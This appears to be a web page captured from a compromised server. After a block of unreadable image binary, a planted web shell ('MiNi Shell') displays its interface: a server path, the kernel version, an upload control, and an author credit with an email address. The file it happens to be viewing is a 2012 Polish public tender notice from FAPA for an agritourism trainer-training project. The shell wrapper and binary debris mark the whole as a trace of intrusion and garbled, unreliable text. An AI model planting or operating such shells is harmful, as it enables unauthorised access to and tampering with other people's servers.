JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121012/396542-N-2012.html

<p class="kh_header"><b>Warszawa: Zakup usług polegających na organizacji projektu Kompetentny trener agroturystyki wsparciem rozwoju  przedsiębiorczości wiejskiej</b><br>
<b>Numer ogłoszenia: 396542 - 2012; data zamieszczenia: 12.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Fundacja Programów Pomocy dla Rolnictwa FAPA , ul. Wspólna 30, 00-930 Warszawa, woj. mazowieckie, tel. 22 623 19 01, faks 22 623 19 09.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Fundacja.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług polegających na organizacji projektu Kompetentny trener agroturystyki wsparciem rozwoju  przedsiębiorczości wiejskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Opis przedmiotu zamówienia:
Przedmiotem zamówienia jest zakup usług polegających na organizacji projektu  Kompetentny trener agroturystyki wsparciem rozwoju  przedsiębiorczości wiejskiej. W celu realizacji przedmiotu zamówienia Wykonawca zorganizuje Biuro Projektu, zwane dalej Biurem, odpowiedzialne za całość prac związanych z realizacją przedmiotu zamówienia.

W celu sprawnego funkcjonowania Biura Wykonawca zapewni:

a)	zespół składający się z osób zapewniających prawidłową i terminową realizację projektu;
b)	minimum jeden numer telefonu stacjonarnego, numer telefonu komórkowego, numer faksu oraz adres mailowy i korespondencyjny;
c)	organizację pracy, która umożliwi łatwy kontakt z przedstawicielami Biura. Czas odpowiedzi na zapytanie mailowe nie może przekroczyć dwóch dni roboczych.

Przedstawiciele Biura będą ściśle współpracować z Zamawiającym i na bieżąco dostarczać wszelkich informacji o realizacji Projektu.




Opis przedmiotu zamówienia:

I.	Opracowanie modułowego programu szkolenia mieszkańców wsi w zakresie agroturystyki 
i turystyki wiejskiej, w tym:
1. zapewnienie min. 5 ekspertów w dziedzinach szczegółowych objętych zakresem tematycznym projektu. Eksperci będą posiadać wykształcenie co najmniej magisterskie oraz kwalifikacje adekwatne do zakresu merytorycznego projektu. Będą posiadać min. 10 letnie doświadczenie zawodowe oraz udokumentowany dorobek naukowy i udział w pracach badawczych.

Program modułowy będzie obejmował wykaz jednostek modułowych z określeniem celu, zakresu 
i czasu szkolenia oraz wstępnych warunków uczestnictwa. W strukturze poszczególnych jednostek modułowych znajdą się:
	szczegółowe cele nauczania,
	materiał nauczania  treści kształcenia,
	środki dydaktyczne,
	wskazania metodyczne dla realizacji programu jednostki,
	propozycje metod sprawdzania  i oceny osiągnięć edukacyjnych.

W zakresie przedmiotowym modułowego programu muszą się znaleźć minimum następujące zagadnienia:
	Teoria usług i produktów turystycznych na obszarach wiejskich.
	Marketing i zarządzenie w turystyce wiejskiej.
	Uwarunkowania formalno-prawne działalności turystycznej mieszkańców wsi.
	Determinanty jakości kwater wiejskich.
	Psychospołeczne uwarunkowania prowadzenia usług turystycznych.
	Wsparcie finansowe dla agroturystyki i turystyki wiejskiej.

II.	Opracowanie merytoryczne i druk podręcznika trenera szkoleń dla mieszkańców wsi, 
w tym:
1.	zapewnienie min. 5 ekspertów w dziedzinach szczegółowych objętych zakresem tematycznym projektu. Eksperci będą posiadać wykształcenie co najmniej magisterskie oraz kwalifikacje adekwatne do zakresu merytorycznego projektu. Będą posiadać min. 10 letnie doświadczenie zawodowe oraz udokumentowany dorobek naukowy i udział w pracach badawczych. 
2.	opracowanie merytoryczne i wydruk podręcznika trenera, który będzie stanowił uporządkowany zestaw materiałów dydaktycznych do każdego modułu programu modułowego szkolenia mieszkańców wsi jw. Zestaw materiałów dydaktycznych będzie obejmował opracowanie tematyczne, studia przypadków, warsztaty, prezentacje 
i wskazówki metodyczne. Podręcznik będzie składał się z drukowanego skryptu oraz z płyty CD DVD.  Płyta CD DVD z nadrukiem kolor, zawierającym tytuł podręcznika, nakład 300 egz. Wydruk skryptów w formacie A4, nakład 300 egz., okładka miękka, off-set, gramatura papieru min. 80 g, kolor 4+1, objętość min. 6 aa.
Ww. materiały opatrzone zostaną logotypami i sloganami zgodnie z załącznikiem nr 7a do wzoru umowy: Wykaz logotypów i sloganów.

III.	 Przeprowadzenie 4 szkoleń stacjonarnych i seminariów internetowych dla trenerów, przygotowujących do prowadzenia szkoleń dla mieszkańców wsi, w tym:
1. przeprowadzenie 4 szkoleń stacjonarnych dla 160 trenerów, na jedno szkolenie  średnio 40 trenerów. Celem szkoleń jest przygotowanie ogólnopolskiej grupy trenerów do realizacji 
w terenie modułowego programu szkolenia dla mieszkańców wsi (opisane pkt I). 
Szkolenie stacjonarne trenerów będzie obejmować:
	przygotowanie merytoryczne polegające na omówieniu wybranych treści merytorycznych programu,
	przygotowanie metodyczne obejmujące doskonalenie umiejętności pedagogicznych 
i doradczych,
	przygotowanie psychologiczne polegające na kształtowaniu postaw i kompetencji społecznych. 
Szkolenie stacjonarne obejmować będzie 38 godzin dydaktycznych realizowanych 
w ciągu 5 dni kalendarzowych, obejmujących 24 godzin wykładów, 6 godzin warsztatów 
w grupach nominalnych oraz 8 godzin zajęć w trakcie wyjazdu studyjnego. 
Planowane są 4 szkolenia stacjonarne dla łącznej liczby 160 trenerów z całej Polski.
Uczestnikami szkoleń będą przedstawiciele doradztwa rolniczego, stowarzyszeń agroturystycznych, szkół rolniczych oraz innych instytucji i organizacji współpracujących z rolnikami w zakresie różnicowania działalności rolniczej.  
a)	zapewnienie  jednej sali wykładowej na wykłady oraz trzech sal wykładowych na warsztaty wyposażone w odpowiednią do liczby uczestników liczbę miejsc do siedzenia, sprzęt multimedialny, na każde z 4 szkoleń, w odległości maksymalnie do 1 km od miejsca zakwaterowania, w przypadku gdy odległość będzie większa niż 1 km, Wykonawca zapewni transport uczestników z miejsca zakwaterowania do sali konferencyjnej.
b)	zapewnienie min. 5 wykładowców/moderatorów na szkolenia stacjonarne posiadających wykształcenie co najmniej wyższe magisterskie, kwalifikacje adekwatne do zakresu merytorycznego prowadzonych zajęć oraz min 3 letnie doświadczenie w dziedzinie adekwatnej do przedmiotu szkolenia.
c)	zakwaterowanie maksymalnie 160 trenerów (cztery noclegi) ze śniadaniem w pokojach 2- lub 3-osobowych w hotelu o standardzie co najmniej 3-gwiazdkowym lub równoważnym 
(z osobnym węzłem sanitarnym w każdym pokoju), na jedno szkolenie średnio 40 trenerów. Zakwaterowanie na terenie województwa małopolskiego. W przypadku braku możliwości zakwaterowania uczestników w hotelu o ww. standardzie i w ww. lokalizacji, Wykonawca zapewnieni transport uczestników z miejsca zakwaterowania do wyznaczonych przez Zamawiającego miejsc.
d)	wyżywienie dla maksymalnie 160 trenerów (na jedno szkolenie  średnio 40 trenerów), 
w tym na jedno szkolenie:
I dnia:
- obiad dwudaniowy,
- kolacja,
- 2 serwisy kawowe - kawa lub herbata, napoje zimne, produkty cukiernicze,
II dnia:
- obiad dwudaniowy,
- kolacja,
- 2 serwisy kawowe - kawa lub herbata, napoje zimne, produkty cukiernicze,
III dnia:
- obiad dwudaniowy,
- kolacja,
- 2 serwisy kawowe - kawa lub herbata, napoje zimne, produkty cukiernicze,
IV dnia:
- obiad dwudaniowy,
- kolacja,
- 2 serwisy kawowe - kawa lub herbata, napoje zimne, produkty cukiernicze,
V dnia:
- obiad dwudaniowy,
- 1serwis  kawowy- kawa lub herbata, napoje zimne, produkty cukiernicze,
e)  ubezpieczenie OC i NNW 160 trenerów wyjazdu studyjnego, na jeden wyjazd średnio 40 trenerów,
f) nabór 160 trenerów zgodnie z określoną w założeniach grupą odbiorców i wymaganiami szkolenia we współpracy z Ministerstwem Rolnictwa i Rozwoju Wsi oraz Polską Federacja Turystyki Wiejskiej Gospodarstwa Gościnne, jako parterami projektu,
g) przeprowadzenie testu sprawdzającego wyniki nauczania i wydanie uczestnikom zaświadczeń o ukończeniu szkolenia,
h) przeprowadzenie po zakończeniu każdego stacjonarnego szkolenia ankiety jakościowej, służącej do oceny szkolenia i zbadania potrzeb szkoleniowych uczestników,
i) zapewnienie 160 zestawów materiałów szkoleniowych obejmujący: torbę, teczkę kartonową, notatnik, długopis oraz podręcznik trenera (pkt II).
Parametry techniczne:
- teczka kartonowa (format A4, karton, zapinany gumką), 
- notatnik (format A5, papier offset 70-80g m2 biały w kratkę, min. 50 kartek),
- torba papierowa (wymiary: 230 x 330 x 75 mm.+ - 5 cm,  papier kredowy lakierowany 120 g m2, uchwyt podwójny sznurkowy).
Teczka kartonowa, notatnik, torba papierowa zostaną opatrzone logotypami 
i sloganami zgodnie z załącznikiem nr 7a do wzoru umowy: Wykaz logotypów i sloganów.
- długopis (plastik, półautomat, 10 mm, wkład wymienny 0,5 mm), zostanie opatrzony logotypami zgodnie z załącznikiem nr 7b do wzoru umowy: Wykaz logotypów.
j) transport autokarowy maksymalnie 160 trenerów na jednodniowe wyjazdy studyjne do przykładowych obiektów turystyki wiejskiej prezentujących dobre praktyki w zakresie zakwaterowania i usług czasu wolnego (na jeden wyjazd średnio 40 trenerów) na terenie województwa małopolskiego ok. 250 km każdy z 4 wyjazdów,

2.	przeprowadzenie 5 seminariów internetowych dla 160 trenerów, na jedno seminarium minimum 32 trenerów, które odbędą się na platformie internetowej i dotyczyć będą pogłębienia wiedzy w wybranych zagadnieniach merytorycznych objętych programem modułowym i szkoleniami stacjonarnymi. Seminaria internetowe będą dostępne wyłącznie dla uczestników szkoleń stacjonarnych dla trenerów zarejestrowanych na platformie edukacyjnej. Seminaria będą odbywały się w formie czatu z ekspertami/specjalistami w określonym dniu i godzinie.  
a)	zapewnienie wykładowców/moderatorów na seminaria internetowe - min. 1 wykładowca/moderator na jedno seminarium,  posiadających wykształcenie co najmniej wyższe magisterskie, kwalifikacje adekwatne do zakresu merytorycznego prowadzonych zajęć oraz min 3 letnie doświadczenie w dziedzinie adekwatnej do przedmiotu szkolenia,
b)	zapewnienie platformy internetowej z szerokopasmowym łączem internetowym do przeprowadzenia seminariów,
c)	zapewnienie sali komputerowej z min. 5 stanowiskami komputerowymi do przeprowadzenia seminarium w wymiarze 5 dni po 3 godz.

IV.	 Wykonawca wykona niniejsze zamówienie w porozumieniu z partnerami projektu.

Partnerami projektu są:
a)	Centrum Doradztwa Rolniczego w Brwinowie Oddział w Krakowie,
b)	Polska Federacja Turystyki Wiejskiej Gospodarstwa Gościnne,
c)	Ministerstwo Rolnictwa i Rozwoju Wsi,
d)	Ministerstwo Sportu i Turystyki.

V.	Pozostałe warunki dotyczące realizacji zamówienia zostały określone we wzorze umowy, stanowiącym załącznik nr 6 do SIWZ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 60.00.00.00-9, 55.10.00.00-1, 80.00.00.00-4, 80.50.00.00-9, 80.51.00.00-2, 66.51.00.00-8, 79.82.40.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek ten za spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy niż 3 lata - w tym okresie, wykonał lub wykonuje, co najmniej 3 (trzy) usługi 
o wartości każdej usługi nie mniejszej niż 200 000,00 zł brutto każda (słownie: dwieście tysięcy złotych 00/100), z których każda polegała na kompleksowej realizacji usług w zakresie organizowania szkoleń dla co najmniej 40 osób oraz opracowaniu merytorycznym i druku materiałów szkoleniowych. Wykonanie jednej usługi jest równoznaczne z wykonaniem jednej umowy (jednego zamówienia na rzecz jednego Zamawiającego).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje:
a)	co najmniej pięcioma osobami posiadającymi wykształcenie co najmniej magisterskie oraz kwalifikacje adekwatne do zakresu merytorycznego projektu. Posiadające min. 10 letnie doświadczenie zawodowe oraz udokumentowany dorobek naukowy i udział w pracach badawczych,
b)	co najmniej pięcioma osobami posiadającymi wykształcenie co najmniej wyższe magisterskie, kwalifikacje adekwatne do zakresu merytorycznego prowadzonych zajęć oraz min 3 letnie doświadczenie w dziedzinie adekwatnej do przedmiotu szkolenia,
c) co najmniej jedną osobą posiadającą  wykształcenie polonistyczne i doświadczenie 
w wykonywaniu korekty językowej przez minimum 3 lata lub tylko z doświadczeniem 
w wykonywaniu korekty językowej tekstów przez minimum 4 lata,
d) co najmniej jedną osobą posiadającą minimum 3-letnie doświadczenie w wykonywaniu projektów graficznych publikacji,
Wykonawca może zaproponować większą ilość osób uczestniczących w realizacji niniejszego zamówienia, jednakże w takim przypadku, każda osoba wskazana dodatkowo ponad wymagane minimum, musi spełniać powyższy warunek udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.fapa.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Fundacja Programów Pomocy dla Rolnictwa FAPA, ul. Wspólna 30, 00-930 Warszawa, Kancelaria pok. 253.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2012 godzina 11:00, miejsce: Fundacja Programów Pomocy dla Rolnictwa FAPA, ul. Wspólna 30, 00-930 Warszawa, Kancelaria pok. 253.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Schemat III Pomocy Technicznej programu Rozwoju Obszarów Wiejskich na lata 2007-2013..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com